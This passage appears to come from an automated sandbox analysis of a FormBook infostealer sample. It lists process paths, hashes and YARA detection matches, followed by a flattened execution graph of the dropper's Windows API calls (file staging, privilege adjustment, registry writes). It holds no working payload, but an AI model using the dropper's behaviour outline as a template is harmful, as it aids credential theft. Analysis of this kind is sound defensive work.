                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.8752999026.0000000004E50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                    Reputation:moderate
                                                                                    Has exited:false

                                                                                    Target ID:5
                                                                                    Start time:15:07:11
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Program Files (x86)\xWRDBjNurNxAHXPmPUzJfASReCWRqOHlLKYYBZzCUvQGolgpFHtbZtyYBPNPuKZHFpMIT\YRrrNrIQCTKNXVoSiuJzTSdqxJTSo.exe"
                                                                                    Imagebase:0xe00000
                                                                                    File size:140'800 bytes
                                                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.8751671842.00000000015C0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:6
                                                                                    Start time:15:08:38
                                                                                    Start date:18/03/2024
                                                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                    Imagebase:0x7ff7a9000000
                                                                                    File size:687'008 bytes
                                                                                    MD5 hash:D1CC73370B9EF7D74E6D9FD9248CD687
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                      Execution Graph

                                                                                      Execution Coverage:21.2%
                                                                                      Dynamic/Decrypted Code Coverage:13.7%
                                                                                      Signature Coverage:20%
                                                                                      Total number of Nodes:1542
                                                                                      Total number of Limit Nodes:45
401e9e 4284->4285 4286 401eb0 GetExitCodeProcess 4285->4286 4297 406430 4285->4297 4289 401ec2 4286->4289 4290 401ecf 4286->4290 4301 405f61 wsprintfW 4289->4301 4290->4283 4293 401ecd 4290->4293 4293->4283 4295 401e7c 4294->4295 4296 40572d CloseHandle 4294->4296 4295->4283 4295->4284 4295->4287 4296->4295 4298 40644d PeekMessageW 4297->4298 4299 406443 DispatchMessageW 4298->4299 4300 401ea5 WaitForSingleObject 4298->4300 4299->4298 4300->4285 4301->4293 4414 401767 4415 402bbf 18 API calls 4414->4415 4416 40176e 4415->4416 4417 401796 4416->4417 4418 40178e 4416->4418 4476 40601a lstrcpynW 4417->4476 4475 40601a lstrcpynW 4418->4475 4421 401794 4425 4062ae 5 API calls 4421->4425 4422 4017a1 4477 4059ce lstrlenW CharPrevW 4422->4477 4430 4017b3 4425->4430 4427 4017ef 4483 405bca GetFileAttributesW 4427->4483 4430->4427 4431 4017c5 CompareFileTime 4430->4431 4432 401885 4430->4432 4439 40603c 18 API calls 4430->4439 4444 40601a lstrcpynW 4430->4444 4450 40185c 4430->4450 4453 405bef GetFileAttributesW CreateFileW 4430->4453 4480 40635d FindFirstFileW 4430->4480 4486 40575f 4430->4486 4431->4430 4433 405179 25 API calls 4432->4433 4435 40188f 4433->4435 4434 405179 25 API calls 4452 401871 4434->4452 4454 403027 4435->4454 4438 4018b6 SetFileTime 4440 4018c8 CloseHandle 4438->4440 4439->4430 4441 4018d9 4440->4441 4440->4452 4442 4018f1 4441->4442 4443 4018de 4441->4443 4446 40603c 18 API calls 4442->4446 4445 40603c 18 API calls 4443->4445 4444->4430 4447 4018e6 lstrcatW 4445->4447 4448 4018f9 4446->4448 4447->4448 4451 40575f MessageBoxIndirectW 4448->4451 4450->4434 4450->4452 4451->4452 4453->4430 4456 403040 4454->4456 4455 40306b 4490 40320c 4455->4490 4456->4455 4500 403222 SetFilePointer 4456->4500 4460 403088 GetTickCount 4471 40309b 4460->4471 4461 4031ac 4462 4031b0 4461->4462 4467 4031c8 4461->4467 4464 40320c ReadFile 4462->4464 4463 4018a2 4463->4438 4463->4440 4464->4463 4465 40320c ReadFile 4465->4467 4466 40320c ReadFile 4466->4471 4467->4463 
4467->4465 4468 405ca1 WriteFile 4467->4468 4468->4467 4470 403101 GetTickCount 4470->4471 4471->4463 4471->4466 4471->4470 4472 40312a MulDiv wsprintfW 4471->4472 4474 405ca1 WriteFile 4471->4474 4493 406533 4471->4493 4473 405179 25 API calls 4472->4473 4473->4471 4474->4471 4475->4421 4476->4422 4478 4017a7 lstrcatW 4477->4478 4479 4059ea lstrcatW 4477->4479 4478->4421 4479->4478 4481 406373 FindClose 4480->4481 4482 40637e 4480->4482 4481->4482 4482->4430 4484 405be9 4483->4484 4485 405bdc SetFileAttributesW 4483->4485 4484->4430 4485->4484 4487 405774 4486->4487 4488 4057c0 4487->4488 4489 405788 MessageBoxIndirectW 4487->4489 4488->4430 4489->4488 4491 405c72 ReadFile 4490->4491 4492 403076 4491->4492 4492->4460 4492->4461 4492->4463 4494 406558 4493->4494 4495 406560 4493->4495 4494->4471 4495->4494 4496 4065f0 GlobalAlloc 4495->4496 4497 4065e7 GlobalFree 4495->4497 4498 406667 GlobalAlloc 4495->4498 4499 40665e GlobalFree 4495->4499 4496->4494 4496->4495 4497->4496 4498->4494 4498->4495 4499->4498 4500->4455 5283 401ee9 5284 402bbf 18 API calls 5283->5284 5285 401ef0 5284->5285 5286 40635d 2 API calls 5285->5286 5287 401ef6 5286->5287 5289 401f07 5287->5289 5290 405f61 wsprintfW 5287->5290 5290->5289 5291 100018a9 5292 100018cc 5291->5292 5293 100018ff GlobalFree 5292->5293 5294 10001911 5292->5294 5293->5294 5295 10001272 2 API calls 5294->5295 5296 10001a87 GlobalFree GlobalFree 5295->5296 4504 40326a SetErrorMode GetVersion 4505 4032a5 4504->4505 4506 40329f 4504->4506 4592 406384 GetSystemDirectoryW 4505->4592 4507 4063f4 5 API calls 4506->4507 4507->4505 4509 4032bb lstrlenA 4509->4505 4510 4032cb 4509->4510 4595 4063f4 GetModuleHandleA 4510->4595 4513 4063f4 5 API calls 4514 4032da #17 OleInitialize SHGetFileInfoW 4513->4514 4601 40601a lstrcpynW 4514->4601 4516 403317 GetCommandLineW 4602 40601a lstrcpynW 4516->4602 4518 403329 GetModuleHandleW 4519 403341 4518->4519 4520 4059fb CharNextW 4519->4520 4521 403350 CharNextW 4520->4521 4522 40347a 
GetTempPathW 4521->4522 4530 403369 4521->4530 4603 403239 4522->4603 4524 403492 4525 403496 GetWindowsDirectoryW lstrcatW 4524->4525 4526 4034ec DeleteFileW 4524->4526 4527 403239 12 API calls 4525->4527 4613 402dee GetTickCount GetModuleFileNameW 4526->4613 4531 4034b2 4527->4531 4528 4059fb CharNextW 4528->4530 4530->4528 4536 403465 4530->4536 4538 403463 4530->4538 4531->4526 4533 4034b6 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4531->4533 4532 403500 4534 4035b3 4532->4534 4539 4035a3 4532->4539 4543 4059fb CharNextW 4532->4543 4537 403239 12 API calls 4533->4537 4714 403789 4534->4714 4697 40601a lstrcpynW 4536->4697 4541 4034e4 4537->4541 4538->4522 4641 403863 4539->4641 4541->4526 4541->4534 4556 40351f 4543->4556 4545 4036ed 4548 403771 ExitProcess 4545->4548 4549 4036f5 GetCurrentProcess OpenProcessToken 4545->4549 4546 4035cd 4547 40575f MessageBoxIndirectW 4546->4547 4551 4035db ExitProcess 4547->4551 4554 403741 4549->4554 4555 40370d LookupPrivilegeValueW AdjustTokenPrivileges 4549->4555 4552 4035e3 4721 4056e2 4552->4721 4553 40357d 4698 405ad6 4553->4698 4559 4063f4 5 API calls 4554->4559 4555->4554 4556->4552 4556->4553 4562 403748 4559->4562 4565 40375d ExitWindowsEx 4562->4565 4566 40376a 4562->4566 4563 403604 lstrcatW lstrcmpiW 4563->4534 4568 403620 4563->4568 4564 4035f9 lstrcatW 4564->4563 4565->4548 4565->4566 4569 40140b 2 API calls 4566->4569 4571 403625 4568->4571 4572 40362c 4568->4572 4569->4548 4570 403598 4713 40601a lstrcpynW 4570->4713 4724 405648 CreateDirectoryW 4571->4724 4729 4056c5 CreateDirectoryW 4572->4729 4576 403631 SetCurrentDirectoryW 4578 403641 4576->4578 4579 40364c 4576->4579 4732 40601a lstrcpynW 4578->4732 4733 40601a lstrcpynW 4579->4733 4582 40603c 18 API calls 4583 40368b DeleteFileW 4582->4583 4584 403698 CopyFileW 4583->4584 4589 40365a 4583->4589 4584->4589 4585 4036e1 4586 405ebb 38 API calls 4585->4586 4586->4534 4588 40603c 18 API calls 4588->4589 4589->4582 4589->4585 
4589->4588 4590 4056fa 2 API calls 4589->4590 4591 4036cc CloseHandle 4589->4591 4734 405ebb MoveFileExW 4589->4734 4590->4589 4591->4589 4593 4063a6 wsprintfW LoadLibraryExW 4592->4593 4593->4509 4596 406410 4595->4596 4597 40641a GetProcAddress 4595->4597 4599 406384 3 API calls 4596->4599 4598 4032d3 4597->4598 4598->4513 4600 406416 4599->4600 4600->4597 4600->4598 4601->4516 4602->4518 4604 4062ae 5 API calls 4603->4604 4605 403245 4604->4605 4606 40324f 4605->4606 4607 4059ce 3 API calls 4605->4607 4606->4524 4608 403257 4607->4608 4609 4056c5 2 API calls 4608->4609 4610 40325d 4609->4610 4738 405c1e 4610->4738 4742 405bef GetFileAttributesW CreateFileW 4613->4742 4615 402e2e 4634 402e3e 4615->4634 4743 40601a lstrcpynW 4615->4743 4617 402e54 4744 405a1a lstrlenW 4617->4744 4621 402e65 GetFileSize 4622 402e7c 4621->4622 4638 402f61 4621->4638 4625 40320c ReadFile 4622->4625 4628 402fcd 4622->4628 4622->4634 4636 402d8a 6 API calls 4622->4636 4622->4638 4624 402f6a 4626 402f9a GlobalAlloc 4624->4626 4624->4634 4761 403222 SetFilePointer 4624->4761 4625->4622 4760 403222 SetFilePointer 4626->4760 4631 402d8a 6 API calls 4628->4631 4630 402fb5 4633 403027 36 API calls 4630->4633 4631->4634 4632 402f83 4635 40320c ReadFile 4632->4635 4637 402fc1 4633->4637 4634->4532 4639 402f8e 4635->4639 4636->4622 4637->4634 4640 402ffe SetFilePointer 4637->4640 4749 402d8a 4638->4749 4639->4626 4639->4634 4640->4634 4642 4063f4 5 API calls 4641->4642 4643 403877 4642->4643 4644 40387d GetUserDefaultUILanguage 4643->4644 4645 40388f 4643->4645 4762 405f61 wsprintfW 4644->4762 4646 405ee7 3 API calls 4645->4646 4648 4038bf 4646->4648 4650 4038de lstrcatW 4648->4650 4651 405ee7 3 API calls 4648->4651 4649 40388d 4763 403b39 4649->4763 4650->4649 4651->4650 4654 405ad6 18 API calls 4655 403910 4654->4655 4656 4039a4 4655->4656 4658 405ee7 3 API calls 4655->4658 4657 405ad6 18 API calls 4656->4657 4659 4039aa 4657->4659 4661 403942 4658->4661 4660 4039ba LoadImageW 4659->4660 4662 
40603c 18 API calls 4659->4662 4663 403a60 4660->4663 4664 4039e1 RegisterClassW 4660->4664 4661->4656 4665 403963 lstrlenW 4661->4665 4669 4059fb CharNextW 4661->4669 4662->4660 4668 40140b 2 API calls 4663->4668 4666 403a17 SystemParametersInfoW CreateWindowExW 4664->4666 4667 403a6a 4664->4667 4670 403971 lstrcmpiW 4665->4670 4671 403997 4665->4671 4666->4663 4667->4534 4672 403a66 4668->4672 4673 403960 4669->4673 4670->4671 4674 403981 GetFileAttributesW 4670->4674 4675 4059ce 3 API calls 4671->4675 4672->4667 4677 403b39 19 API calls 4672->4677 4673->4665 4676 40398d 4674->4676 4678 40399d 4675->4678 4676->4671 4679 405a1a 2 API calls 4676->4679 4680 403a77 4677->4680 4779 40601a lstrcpynW 4678->4779 4679->4671 4682 403a83 ShowWindow 4680->4682 4683 403b06 4680->4683 4685 406384 3 API calls 4682->4685 4772 40524c OleInitialize 4683->4772 4687 403a9b 4685->4687 4686 403b0c 4688 403b10 4686->4688 4689 403b28 4686->4689 4690 403aa9 GetClassInfoW 4687->4690 4692 406384 3 API calls 4687->4692 4688->4667 4696 40140b 2 API calls 4688->4696 4691 40140b 2 API calls 4689->4691 4693 403ad3 DialogBoxParamW 4690->4693 4694 403abd GetClassInfoW RegisterClassW 4690->4694 4691->4667 4692->4690 4695 40140b 2 API calls 4693->4695 4694->4693 4695->4667 4696->4667 4697->4538 4781 40601a lstrcpynW 4698->4781 4700 405ae7 4782 405a79 CharNextW CharNextW 4700->4782 4703 403589 4703->4534 4712 40601a lstrcpynW 4703->4712 4704 4062ae 5 API calls 4710 405afd 4704->4710 4705 405b2e lstrlenW 4706 405b39 4705->4706 4705->4710 4708 4059ce 3 API calls 4706->4708 4707 40635d 2 API calls 4707->4710 4709 405b3e GetFileAttributesW 4708->4709 4709->4703 4710->4703 4710->4705 4710->4707 4711 405a1a 2 API calls 4710->4711 4711->4705 4712->4570 4713->4539 4715 4037a1 4714->4715 4716 403793 CloseHandle 4714->4716 4788 4037ce 4715->4788 4716->4715 4722 4063f4 5 API calls 4721->4722 4723 4035e8 lstrcatW 4722->4723 4723->4563 4723->4564 4725 40362a 4724->4725 4726 405699 GetLastError 4724->4726 
4725->4576 4726->4725 4727 4056a8 SetFileSecurityW 4726->4727 4727->4725 4728 4056be GetLastError 4727->4728 4728->4725 4730 4056d5 4729->4730 4731 4056d9 GetLastError 4729->4731 4730->4576 4731->4730 4732->4579 4733->4589 4735 405ecf 4734->4735 4737 405edc 4734->4737 4841 405d49 lstrcpyW 4735->4841 4737->4589 4739 405c2b GetTickCount GetTempFileNameW 4738->4739 4740 405c61 4739->4740 4741 403268 4739->4741 4740->4739 4740->4741 4741->4524 4742->4615 4743->4617 4745 405a28 4744->4745 4746 402e5a 4745->4746 4747 405a2e CharPrevW 4745->4747 4748 40601a lstrcpynW 4746->4748 4747->4745 4747->4746 4748->4621 4750 402d93 4749->4750 4751 402dab 4749->4751 4752 402da3 4750->4752 4753 402d9c DestroyWindow 4750->4753 4754 402db3 4751->4754 4755 402dbb GetTickCount 4751->4755 4752->4624 4753->4752 4756 406430 2 API calls 4754->4756 4757 402dc9 CreateDialogParamW ShowWindow 4755->4757 4758 402dec 4755->4758 4759 402db9 4756->4759 4757->4758 4758->4624 4759->4624 4760->4630 4761->4632 4762->4649 4764 403b4d 4763->4764 4780 405f61 wsprintfW 4764->4780 4766 403bbe 4767 40603c 18 API calls 4766->4767 4768 403bca SetWindowTextW 4767->4768 4769 4038ee 4768->4769 4770 403be6 4768->4770 4769->4654 4770->4769 4771 40603c 18 API calls 4770->4771 4771->4770 4773 40412a SendMessageW 4772->4773 4775 40526f 4773->4775 4774 40412a SendMessageW 4776 4052a8 OleUninitialize 4774->4776 4777 401389 2 API calls 4775->4777 4778 405296 4775->4778 4776->4686 4777->4775 4778->4774 4779->4656 4780->4766 4781->4700 4783 405a96 4782->4783 4784 405aa8 4782->4784 4783->4784 4785 405aa3 CharNextW 4783->4785 4786 4059fb CharNextW 4784->4786 4787 405acc 4784->4787 4785->4787 4786->4784 4787->4703 4787->4704 4789 4037dc 4788->4789 4790 4037a6 4789->4790 4791 4037e1 FreeLibrary GlobalFree 4789->4791 4792 40580b 4790->4792 4791->4790 4791->4791 4793 405ad6 18 API calls 4792->4793 4794 40582b 4793->4794 4795 405833 DeleteFileW 4794->4795 4796 40584a 4794->4796 4797 4035bc OleUninitialize 4795->4797 4798 40596a 
4796->4798 4831 40601a lstrcpynW 4796->4831 4797->4545 4797->4546 4798->4797 4804 40635d 2 API calls 4798->4804 4800 405870 4801 405883 4800->4801 4802 405876 lstrcatW 4800->4802 4803 405a1a 2 API calls 4801->4803 4805 405889 4802->4805 4803->4805 4807 40598f 4804->4807 4806 405899 lstrcatW 4805->4806 4808 4058a4 lstrlenW FindFirstFileW 4805->4808 4806->4808 4807->4797 4809 405993 4807->4809 4808->4798 4816 4058c6 4808->4816 4810 4059ce 3 API calls 4809->4810 4811 405999 4810->4811 4813 4057c3 5 API calls 4811->4813 4812 40594d FindNextFileW 4812->4816 4817 405963 FindClose 4812->4817 4815 4059a5 4813->4815 4818 4059a9 4815->4818 4819 4059bf 4815->4819 4816->4812 4820 40590e 4816->4820 4832 40601a lstrcpynW 4816->4832 4817->4798 4818->4797 4823 405179 25 API calls 4818->4823 4822 405179 25 API calls 4819->4822 4820->4812 4824 40580b 62 API calls 4820->4824 4826 405179 25 API calls 4820->4826 4829 405179 25 API calls 4820->4829 4830 405ebb 38 API calls 4820->4830 4833 4057c3 4820->4833 4822->4797 4825 4059b6 4823->4825 4824->4820 4827 405ebb 38 API calls 4825->4827 4826->4812 4828 4059bd 4827->4828 4828->4797 4829->4820 4830->4820 4831->4800 4832->4816 4834 405bca 2 API calls 4833->4834 4835 4057cf 4834->4835 4836 4057f0 4835->4836 4837 4057e6 DeleteFileW 4835->4837 4838 4057de RemoveDirectoryW 4835->4838 4836->4820 4839 4057ec 4837->4839 4838->4839 4839->4836 4840 4057fc SetFileAttributesW 4839->4840 4840->4836 4842 405d71 4841->4842 4843 405d97 GetShortPathNameW 4841->4843 4868 405bef GetFileAttributesW CreateFileW 4842->4868 4844 405eb6 4843->4844 4845 405dac 4843->4845 4844->4737 4845->4844 4847 405db4 wsprintfA 4845->4847 4849 40603c 18 API calls 4847->4849 4848 405d7b CloseHandle GetShortPathNameW 4848->4844 4850 405d8f 4848->4850 4851 405ddc 4849->4851 4850->4843 4850->4844 4869 405bef GetFileAttributesW CreateFileW 4851->4869 4853 405de9 4853->4844 4854 405df8 GetFileSize GlobalAlloc 4853->4854 4855 405e1a 4854->4855 4856 405eaf CloseHandle 4854->4856 4857 
405c72 ReadFile 4855->4857 4856->4844 4858 405e22 4857->4858 4858->4856 4870 405b54 lstrlenA 4858->4870 4861 405e39 lstrcpyA 4864 405e5b 4861->4864 4862 405e4d 4863 405b54 4 API calls 4862->4863 4863->4864 4865 405e92 SetFilePointer 4864->4865 4866 405ca1 WriteFile 4865->4866 4867 405ea8 GlobalFree 4866->4867 4867->4856 4868->4848 4869->4853 4871 405b95 lstrlenA 4870->4871 4872 405b9d 4871->4872 4873 405b6e lstrcmpiA 4871->4873 4872->4861 4872->4862 4873->4872 4874 405b8c CharNextA 4873->4874 4874->4871 5297 4021ea 5298 402bbf 18 API calls 5297->5298 5299 4021f0 5298->5299 5300 402bbf 18 API calls 5299->5300 5301 4021f9 5300->5301 5302 402bbf 18 API calls 5301->5302 5303 402202 5302->5303 5304 40635d 2 API calls 5303->5304 5305 40220b 5304->5305 5306 40221c lstrlenW lstrlenW 5305->5306 5310 40220f 5305->5310 5308 405179 25 API calls 5306->5308 5307 405179 25 API calls 5311 402217 5307->5311 5309 40225a SHFileOperationW 5308->5309 5309->5310 5309->5311 5310->5307 5310->5311 4891 40156b 4892 401584 4891->4892 4893 40157b ShowWindow 4891->4893 4894 401592 ShowWindow 4892->4894 4895 402a4c 4892->4895 4893->4892 4894->4895 5319 4050ed 5320 405111 5319->5320 5321 4050fd 5319->5321 5324 405119 IsWindowVisible 5320->5324 5330 405130 5320->5330 5322 405103 5321->5322 5323 40515a 5321->5323 5326 40412a SendMessageW 5322->5326 5325 40515f CallWindowProcW 5323->5325 5324->5323 5327 405126 5324->5327 5328 40510d 5325->5328 5326->5328 5332 404a43 SendMessageW 5327->5332 5330->5325 5337 404ac3 5330->5337 5333 404aa2 SendMessageW 5332->5333 5334 404a66 GetMessagePos ScreenToClient SendMessageW 5332->5334 5335 404a9a 5333->5335 5334->5335 5336 404a9f 5334->5336 5335->5330 5336->5333 5346 40601a lstrcpynW 5337->5346 5339 404ad6 5347 405f61 wsprintfW 5339->5347 5341 404ae0 5342 40140b 2 API calls 5341->5342 5343 404ae9 5342->5343 5348 40601a lstrcpynW 5343->5348 5345 404af0 5345->5323 5346->5339 5347->5341 5348->5345 5349 40226e 5350 402288 5349->5350 5351 402275 5349->5351 5352 
40603c 18 API calls 5351->5352 5353 402282 5352->5353 5354 40575f MessageBoxIndirectW 5353->5354 5354->5350 5355 4014f1 SetForegroundWindow 5356 402a4c 5355->5356 5357 4041f2 lstrcpynW lstrlenW 4900 401673 4901 402bbf 18 API calls 4900->4901 4902 40167a 4901->4902 4903 402bbf 18 API calls 4902->4903 4904 401683 4903->4904 4905 402bbf 18 API calls 4904->4905 4906 40168c MoveFileW 4905->4906 4907 401698 4906->4907 4908 40169f 4906->4908 4910 401423 25 API calls 4907->4910 4909 40635d 2 API calls 4908->4909 4912 4021e1 4908->4912 4911 4016ae 4909->4911 4910->4912 4911->4912 4913 405ebb 38 API calls 4911->4913 4913->4907 5358 404af5 GetDlgItem GetDlgItem 5359 404b47 7 API calls 5358->5359 5368 404d60 5358->5368 5360 404bea DeleteObject 5359->5360 5361 404bdd SendMessageW 5359->5361 5362 404bf3 5360->5362 5361->5360 5363 404c2a 5362->5363 5367 40603c 18 API calls 5362->5367 5364 4040de 19 API calls 5363->5364 5369 404c3e 5364->5369 5365 404ef0 5370 404f02 5365->5370 5371 404efa SendMessageW 5365->5371 5366 404e44 5366->5365 5375 404e9d SendMessageW 5366->5375 5398 404d53 5366->5398 5372 404c0c SendMessageW SendMessageW 5367->5372 5368->5366 5373 404a43 5 API calls 5368->5373 5388 404dd1 5368->5388 5374 4040de 19 API calls 5369->5374 5378 404f14 ImageList_Destroy 5370->5378 5379 404f1b 5370->5379 5390 404f2b 5370->5390 5371->5370 5372->5362 5373->5388 5389 404c4c 5374->5389 5381 404eb2 SendMessageW 5375->5381 5375->5398 5376 404145 8 API calls 5382 4050e6 5376->5382 5377 404e36 SendMessageW 5377->5366 5378->5379 5383 404f24 GlobalFree 5379->5383 5379->5390 5380 40509a 5386 4050ac ShowWindow GetDlgItem ShowWindow 5380->5386 5380->5398 5385 404ec5 5381->5385 5383->5390 5384 404d21 GetWindowLongW SetWindowLongW 5387 404d3a 5384->5387 5396 404ed6 SendMessageW 5385->5396 5386->5398 5391 404d40 ShowWindow 5387->5391 5392 404d58 5387->5392 5388->5366 5388->5377 5389->5384 5395 404c9c SendMessageW 5389->5395 5397 404d1b 5389->5397 5399 404cd8 SendMessageW 5389->5399 5400 404ce9 
SendMessageW 5389->5400 5390->5380 5401 404ac3 4 API calls 5390->5401 5405 404f66 5390->5405 5409 404113 SendMessageW 5391->5409 5410 404113 SendMessageW 5392->5410 5395->5389 5396->5365 5397->5384 5397->5387 5398->5376 5399->5389 5400->5389 5401->5405 5402 405070 InvalidateRect 5402->5380 5403 405086 5402->5403 5411 4049fe 5403->5411 5404 404f94 SendMessageW 5407 404faa 5404->5407 5405->5404 5405->5407 5407->5402 5408 40501e SendMessageW SendMessageW 5407->5408 5408->5407 5409->5398 5410->5368 5414 404935 5411->5414 5413 404a13 5413->5380 5415 40494e 5414->5415 5416 40603c 18 API calls 5415->5416 5417 4049b2 5416->5417 5418 40603c 18 API calls 5417->5418 5419 4049bd 5418->5419 5420 40603c 18 API calls 5419->5420 5421 4049d3 lstrlenW wsprintfW SetDlgItemTextW 5420->5421 5421->5413 5422 100016b6 5423 100016e5 5422->5423 5424 10001b18 22 API calls 5423->5424 5425 100016ec 5424->5425 5426 100016f3 5425->5426 5427 100016ff 5425->5427 5428 10001272 2 API calls 5426->5428 5429 10001726 5427->5429 5430 10001709 5427->5430 5438 100016fd 5428->5438 5432 10001750 5429->5432 5433 1000172c 5429->5433 5431 1000153d 3 API calls 5430->5431 5436 1000170e 5431->5436 5435 1000153d 3 API calls 5432->5435 5434 100015b4 3 API calls 5433->5434 5437 10001731 5434->5437 5435->5438 5439 100015b4 3 API calls 5436->5439 5440 10001272 2 API calls 5437->5440 5441 10001714 5439->5441 5442 10001737 GlobalFree 5440->5442 5443 10001272 2 API calls 5441->5443 5442->5438 5444 1000174b GlobalFree 5442->5444 5445 1000171a GlobalFree 5443->5445 5444->5438 5445->5438 5446 10002238 5447 10002296 5446->5447 5448 100022cc 5446->5448 5447->5448 5449 100022a8 GlobalAlloc 5447->5449 5449->5447 5450 404579 5451 4045a5 5450->5451 5452 4045b6 5450->5452 5511 405743 GetDlgItemTextW 5451->5511 5453 4045c2 GetDlgItem 5452->5453 5486 404621 5452->5486 5456 4045d6 5453->5456 5455 4045b0 5458 4062ae 5 API calls 5455->5458 5459 4045ea SetWindowTextW 5456->5459 5463 405a79 4 API calls 5456->5463 5457 404705 5460 4048b4 
5457->5460 5513 405743 GetDlgItemTextW 5457->5513 5458->5452 5464 4040de 19 API calls 5459->5464 5462 404145 8 API calls 5460->5462 5467 4048c8 5462->5467 5468 4045e0 5463->5468 5469 404606 5464->5469 5465 40603c 18 API calls 5470 404695 SHBrowseForFolderW 5465->5470 5466 404735 5471 405ad6 18 API calls 5466->5471 5468->5459 5475 4059ce 3 API calls 5468->5475 5472 4040de 19 API calls 5469->5472 5470->5457 5473 4046ad CoTaskMemFree 5470->5473 5474 40473b 5471->5474 5476 404614 5472->5476 5477 4059ce 3 API calls 5473->5477 5514 40601a lstrcpynW 5474->5514 5475->5459 5512 404113 SendMessageW 5476->5512 5479 4046ba 5477->5479 5482 4046f1 SetDlgItemTextW 5479->5482 5487 40603c 18 API calls 5479->5487 5481 40461a 5484 4063f4 5 API calls 5481->5484 5482->5457 5483 404752 5485 4063f4 5 API calls 5483->5485 5484->5486 5494 404759 5485->5494 5486->5457 5486->5460 5486->5465 5488 4046d9 lstrcmpiW 5487->5488 5488->5482 5490 4046ea lstrcatW 5488->5490 5489 40479a 5515 40601a lstrcpynW 5489->5515 5490->5482 5492 4047a1 5493 405a79 4 API calls 5492->5493 5495 4047a7 GetDiskFreeSpaceW 5493->5495 5494->5489 5498 405a1a 2 API calls 5494->5498 5500 4047f2 5494->5500 5497 4047cb MulDiv 5495->5497 5495->5500 5497->5500 5498->5494 5499 404863 5502 404886 5499->5502 5504 40140b 2 API calls 5499->5504 5500->5499 5501 4049fe 21 API calls 5500->5501 5503 404850 5501->5503 5516 404100 KiUserCallbackDispatcher 5502->5516 5505 404865 SetDlgItemTextW 5503->5505 5506 404855 5503->5506 5504->5502 5505->5499 5508 404935 21 API calls 5506->5508 5508->5499 5509 4048a2 5509->5460 5517 40450e 5509->5517 5511->5455 5512->5481 5513->5466 5514->5483 5515->5492 5516->5509 5518 404521 SendMessageW 5517->5518 5519 40451c 5517->5519 5518->5460 5519->5518 5520 401cfa GetDlgItem GetClientRect 5521 402bbf 18 API calls 5520->5521 5522 401d2c LoadImageW SendMessageW 5521->5522 5523 401d4a DeleteObject 5522->5523 5524 402a4c 5522->5524 5523->5524 5019 40237b 5020 402381 5019->5020 5021 402bbf 18 API calls 
5020->5021 5022 402393 5021->5022 5023 402bbf 18 API calls 5022->5023 5024 40239d RegCreateKeyExW 5023->5024 5025 4023c7 5024->5025 5035 40281e 5024->5035 5026 402bbf 18 API calls 5025->5026 5027 4023e2 5025->5027 5028 4023d8 lstrlenW 5026->5028 5029 402ba2 18 API calls 5027->5029 5031 4023ee 5027->5031 5028->5027 5029->5031 5030 402409 RegSetValueExW 5033 40241f RegCloseKey 5030->5033 5031->5030 5032 403027 36 API calls 5031->5032 5032->5030 5033->5035 5036 4027fb 5037 402bbf 18 API calls 5036->5037 5038 402802 FindFirstFileW 5037->5038 5039 40282a 5038->5039 5043 402815 5038->5043 5040 402833 5039->5040 5044 405f61 wsprintfW 5039->5044 5045 40601a lstrcpynW 5040->5045 5044->5040 5045->5043 5525 40427b 5526 404293 5525->5526 5530 4043ad 5525->5530 5531 4040de 19 API calls 5526->5531 5527 404417 5528 4044e9 5527->5528 5529 404421 GetDlgItem 5527->5529 5536 404145 8 API calls 5528->5536 5532 4044aa 5529->5532 5533 40443b 5529->5533 5530->5527 5530->5528 5534 4043e8 GetDlgItem SendMessageW 5530->5534 5535 4042fa 5531->5535 5532->5528 5537 4044bc 5532->5537 5533->5532 5541 404461 6 API calls 5533->5541 5556 404100 KiUserCallbackDispatcher 5534->5556 5539 4040de 19 API calls 5535->5539 5540 4044e4 5536->5540 5542 4044d2 5537->5542 5543 4044c2 SendMessageW 5537->5543 5545 404307 CheckDlgButton 5539->5545 5541->5532 5542->5540 5546 4044d8 SendMessageW 5542->5546 5543->5542 5544 404412 5547 40450e SendMessageW 5544->5547 5554 404100 KiUserCallbackDispatcher 5545->5554 5546->5540 5547->5527 5549 404325 GetDlgItem 5555 404113 SendMessageW 5549->5555 5551 40433b SendMessageW 5552 404361 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5551->5552 5553 404358 GetSysColor 5551->5553 5552->5540 5553->5552 5554->5549 5555->5551 5556->5544 5557 1000103d 5558 1000101b 5 API calls 5557->5558 5559 10001056 5558->5559 5560 4014ff 5561 401507 5560->5561 5563 40151a 5560->5563 5562 402ba2 18 API calls 5561->5562 5562->5563 5564 401000 5565 401037 BeginPaint GetClientRect 
